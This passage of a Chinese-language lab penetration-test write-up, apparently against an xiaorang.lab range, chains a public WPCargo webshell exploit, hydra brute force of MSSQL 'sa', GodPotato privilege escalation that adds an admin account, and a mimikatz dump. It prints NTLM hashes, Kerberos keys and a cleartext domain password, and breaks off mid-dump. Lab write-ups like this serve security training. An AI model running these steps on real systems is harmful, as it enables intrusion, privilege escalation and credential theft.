[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK                                         > (37 / 137) 27.00%  ETA: 00:00:19
 Checking Config Backups - Time: 00:00:15 <============================================================================> (137 / 137) 100.00% Time: 00:00:15

[i] No Config Backups Found.

[proxychains] Strict chain  ...  38.55.99.145:8888  ...  wpscan.com:443  ...  OK
[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 22

[+] Finished: Fri Feb 20 03:38:12 2026
[+] Requests Done: 193
[+] Cached Requests: 5
[+] Data Sent: 47.021 KB
[+] Data Received: 23.133 MB
[+] Memory used: 262.477 MB
[+] Elapsed time: 00:00:51

主要问题插件是wpcargo。

biulove0x/CVE-2021-25003: WPCargo < 6.9.0 - Unauthenticated RCE

┌──(root㉿kaada)-[/home/kali/Desktop/CVE-2021-25003]
└─# proxychains4 python3 WpCargo.py -t http://172.22.2.18/
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17

############################################
# @author : biulove0x                      #
# @name   : WP Plugins WPCargo Exploiter   #
# @cve    : CVE-2021-25003                 #
############################################

[proxychains] Strict chain  ...  38.55.99.145:8888  ...  172.22.2.18:80  ...  OK
[-] http://172.22.2.18/wp-content/wp-conf.php => Uploaded!

直接蚁剑设置好代理后连接

在wp-config.php中找到数据库用户和密码

wpuser
WpuserEha8Fgj9

使用蚁剑连接数据库

之后看上面的something，运行，发现是一份密码表

这里要注意要把select的limit去掉,就是全部导出密码.

之前的172.22.2.16有1433端口开放，爆破测试一手

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat pass_dict.txt 
 GKIYrjZU
 3L25FIPy
 9AH3QjIZ
 Aiuc9Lhp
 D0vlIw1n
 fsZ7YTgU
 XG8citrq
 tgNoT7ec
 JSfNGiO9
 bHX7uKah
 uEWgxR9k
 l9QghwVU
 lFGzfdZV
 KOcMaYAf
 MgrYvLf6
 tzCFgn5S
 JCapgEkr
 LBQkzgOG
 TNoGct3b
 mqDQTEN9
                                         

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# proxychains4 hydra -l sa -P pass_dict_2.txt 172.22.2.16 mssql

[proxychains] Strict chain  ...  38.55.99.145:8888 [1433][mssql] host: 172.22.2.16   login: sa   password: ElGNkOiC

使用mdut-extend连接

靶机不出网,无法反弹shell

需要提权,上传godpotato提权

添加一个用户kaada,进入管理员组,准备rdp上去

![vmware_jMAdo3L7GB](2026-02/vmware_jMAdo3L7GB.png)![vmware_jMAdo3L7GB](2026-02/vmware_jMAdo3L7GB.png)C:\Users\Public\GodPotato-NET4.exe -cmd "net user kaada P@ssw0rd123! /add"
[*] CombaseModule: 0x140718741258240
[*] DispatchTable: 0x140718743231104
[*] UseProtseqFunction: 0x140718742753664
[*] UseProtseqFunctionParamCount: 5
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\91d0df4a-9498-449c-865c-14efb4c98f0e\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00003402-05c4-ffff-83c0-4bca2793b634
[*] DCOM obj OXID: 0x6f29bad52912ff2e
[*] DCOM obj OID: 0x936fa4f6520e705d
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 700 Token:0x680  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2568
命令成功完成。
C:\Users\Public\GodPotato-NET4.exe -cmd "net localgroup administrators kaada /add"
C:\Users\Public\GodPotato-NET4.exe -cmd "net localgroup \"Remote Desktop Users\" kaada /add"

先使用minikatz抓一波哈希,导出MSSQLSERVER的票据

C:\Users\Public\GodPotato-NET4.exe -cmd "C:\Users\Public\mimikatz.exe \"log C:\Users\Public\logon_hashes.txt\" \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\""

mimikatz(commandline) # log C:\Users\Public\logon_hashes.txt
Using 'C:\Users\Public\logon_hashes.txt' for logfile : OK

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 5941451 (00000000:005aa8cb)
Session           : RemoteInteractive from 2
User Name         : kaada
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 17:29:39
SID               : S-1-5-21-1403470932-1755135066-2609122076-1027
	msv :	
	 [00000003] Primary
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * NTLM     : 7dfa0531d73101ca080c7379a9bff1c7
	 * SHA1     : a8fcce2ad0528a9c5fde33b1b4a00aee2b5fdac9
	tspkg :	
	wdigest :	
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 5941367 (00000000:005aa877)
Session           : RemoteInteractive from 2
User Name         : kaada
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 17:29:39
SID               : S-1-5-21-1403470932-1755135066-2609122076-1027
	msv :	
	 [00000003] Primary
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * NTLM     : 7dfa0531d73101ca080c7379a9bff1c7
	 * SHA1     : a8fcce2ad0528a9c5fde33b1b4a00aee2b5fdac9
	tspkg :	
	wdigest :	
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : kaada
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 5908860 (00000000:005a297c)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/2/20 17:29:38
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 228845 (00000000:00037ded)
Session           : Interactive from 0
User Name         : MSSQLSERVER17
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1020
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER17
	 * Domain   : MSSQLSERVER
	 * NTLM     : 82fe575c8bb18d01df45eb54d0ebc3b4
	 * SHA1     : 13b87dcba388982dcc44feeba232bb50aa29c7e9
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER17
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER17
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228681 (00000000:00037d49)
Session           : Interactive from 0
User Name         : MSSQLSERVER15
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1018
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER15
	 * Domain   : MSSQLSERVER
	 * NTLM     : 6eeb34930fa71d82a464ce235261effd
	 * SHA1     : 1dfc6d66d9cfdbaa5fc091fedde9a3387771d09b
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER15
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER15
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228600 (00000000:00037cf8)
Session           : Interactive from 0
User Name         : MSSQLSERVER14
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1017
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER14
	 * Domain   : MSSQLSERVER
	 * NTLM     : 7c8553b614055d945f8b8c3cf8eae789
	 * SHA1     : 1efdc2efed20ca503bdefea5aef8aa0ea04c257b
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER14
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER14
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228518 (00000000:00037ca6)
Session           : Interactive from 0
User Name         : MSSQLSERVER13
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1016
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER13
	 * Domain   : MSSQLSERVER
	 * NTLM     : b808e9a53247721e84cc314c870080c5
	 * SHA1     : 47a42f4a6eed2b2d90f342416f42e2696052f546
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER13
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER13
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228356 (00000000:00037c04)
Session           : Interactive from 0
User Name         : MSSQLSERVER11
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1014
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER11
	 * Domain   : MSSQLSERVER
	 * NTLM     : cee10216b2126aa1a3f239b8201120ef
	 * SHA1     : 4867093fc519f7d1e91d80e3790ef8a17a7fdd18
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER11
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER11
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228275 (00000000:00037bb3)
Session           : Interactive from 0
User Name         : MSSQLSERVER10
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1013
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER10
	 * Domain   : MSSQLSERVER
	 * NTLM     : c3e7aa593081ae1b210547da7d46819b
	 * SHA1     : 3bf20cfece021438cf86617f5cabc5e7a69038f7
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER10
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER10
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228111 (00000000:00037b0f)
Session           : Interactive from 0
User Name         : MSSQLSERVER08
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1011
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER08
	 * Domain   : MSSQLSERVER
	 * NTLM     : 465034ebde60dfae889c3e493e1816bf
	 * SHA1     : c96428917f7c8a15ea0370716dee153842afaf02
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER08
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER08
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 228030 (00000000:00037abe)
Session           : Interactive from 0
User Name         : MSSQLSERVER07
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1010
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER07
	 * Domain   : MSSQLSERVER
	 * NTLM     : f9f990df1bc869cc205d2513b788a5b8
	 * SHA1     : 79746cfe5a2f1eec4350a6b64d87b01455ef9030
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER07
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER07
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227948 (00000000:00037a6c)
Session           : Interactive from 0
User Name         : MSSQLSERVER06
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1009
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER06
	 * Domain   : MSSQLSERVER
	 * NTLM     : aa206c617e2194dd76b766b7e3c92bc6
	 * SHA1     : 62dd8046a71c17fe7263bab86b1ca4506f8c373c
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER06
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER06
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227705 (00000000:00037979)
Session           : Interactive from 0
User Name         : MSSQLSERVER03
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1006
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER03
	 * Domain   : MSSQLSERVER
	 * NTLM     : 2f7c88f56a7236f476d18ea6b5a2d33a
	 * SHA1     : 5bc2d09b8b0f7c11a1fc3fb2f97b713ac116b6eb
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER03
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER03
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 227516 (00000000:000378bc)
Session           : Interactive from 0
User Name         : MSSQLSERVER01
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1004
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER01
	 * Domain   : MSSQLSERVER
	 * NTLM     : ded5ad90b3d8560838a777039641c673
	 * SHA1     : a2cd9d2963f29b162847e8a1a2c19d5e0641a162
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER01
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER01
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 184945 (00000000:0002d271)
Session           : Service from 0
User Name         : MSSQLFDLauncher
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:18
SID               : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 97906 (00000000:00017e72)
Session           : Service from 0
User Name         : SSISTELEMETRY130
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-1625532266-625503396-2441596095-4129757946-3375356652
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 92987 (00000000:00016b3b)
Session           : Service from 0
User Name         : MSSQLServerOLAPService
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:09
SID               : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 64003 (00000000:0000fa03)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:08
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : MSSQLSERVER$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2026/2/20 16:10:08
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : mssqlserver$
	 * Domain   : XIAORANG.LAB
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 22956 (00000000:000059ac)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2026/2/20 16:09:53
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 5908837 (00000000:005a2965)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2026/2/20 17:29:38
SID               : S-1-5-90-0-2
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * NTLM     : f496fe749b403f432a5e2c0d49113a29
	 * SHA1     : 860c0b21fed6f351aee372dbae3473686e272d2a
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER$
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER$
	 * Domain   : xiaorang.lab
	 * Password : fe 39 57 2b 53 52 71 e1 a0 13 7e 6f e1 c0 5d 89 83 df 49 06 ac 82 99 3a 4e 7e 27 b3 a0 46 34 4d d3 38 f1 31 9c ea 9b 01 5f 8d 18 2e bc b7 d8 84 52 d4 de 1d e5 cb 7a 83 79 15 33 07 35 5b 23 aa 00 f5 29 88 e6 f1 66 32 21 9f c8 17 e6 48 49 69 
3b f4 56 d9 f6 fe a5 d1 eb c3 87 88 e3 fd a7 b5 5a 5d d1 24 d1 7c 2b 26 e4 fa 3e 14 31 05 d3 96 5d e2 80 59 ea 2f 3a 2a c7 e3 82 ac 19 73 18 04 2f 73 17 03 54 7b d1 fc b9 10 c9 64 17 7f 3f 3e f6 a9 61 2c 1f cb 83 2f 53 ab f1 37 1b b1 69 f5 14 1b ff b5 3c 
80 5d 77 7d 18 72 08 11 32 5b 61 27 1b ca 9a 91 0a e7 98 fa b1 4a af e1 6a 11 2d ee 1c 2d 17 3d 49 79 81 92 42 15 6c 31 e8 2d 75 ab 7a aa 81 f8 86 af 7f 37 50 d2 66 63 87 4e 88 d6 50 de 88 ed 3e d5 10 55 f5 f4 36 3a 32 8b d1 
	ssp :	
	credman :	

Authentication Id : 0 ; 280828 (00000000:000448fc)
Session           : Interactive from 1
User Name         : William
Domain            : XIAORANG
Logon Server      : DC
Logon Time        : 2026/2/20 16:10:35
SID               : S-1-5-21-2704639352-1689326099-2164665914-1106
	msv :	
	 [00000003] Primary
	 * Username : William
	 * Domain   : XIAORANG
	 * NTLM     : 8853911fd59e8d0a82176e085a2157de
	 * SHA1     : e4fd18cfd47b9a77836c82283fb560e6f465bc40
	 * DPAPI    : da3fc187c1ff105853ec62c10cddd26b
	tspkg :	
	wdigest :	
	 * Username : William
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : William
	 * Domain   : XIAORANG.LAB
	 * Password : Willg1UoO6Jt
	ssp :	
	credman :	

Authentication Id : 0 ; 229093 (00000000:00037ee5)
Session           : Interactive from 0
User Name         : MSSQLSERVER20
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1023
	msv :	
	 [00000003] Primary
	 * Username : MSSQLSERVER20
	 * Domain   : MSSQLSERVER
	 * NTLM     : f5c512b9cb3052c5ad35e526d44ba85a
	 * SHA1     : b09c8d9463c494d36e1a4656c15af8e1a7e4568f
	tspkg :	
	wdigest :	
	 * Username : MSSQLSERVER20
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	kerberos :	
	 * Username : MSSQLSERVER20
	 * Domain   : MSSQLSERVER
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 229011 (00000000:00037e93)
Session           : Interactive from 0
User Name         : MSSQLSERVER19
Domain            : MSSQLSERVER
Logon Server      : MSSQLSERVER
Logon Time        : 2026/2/20 16:10:31
SID               : S-1-5-21-1403470932-1755135066-2609122076-1022
	msv :	
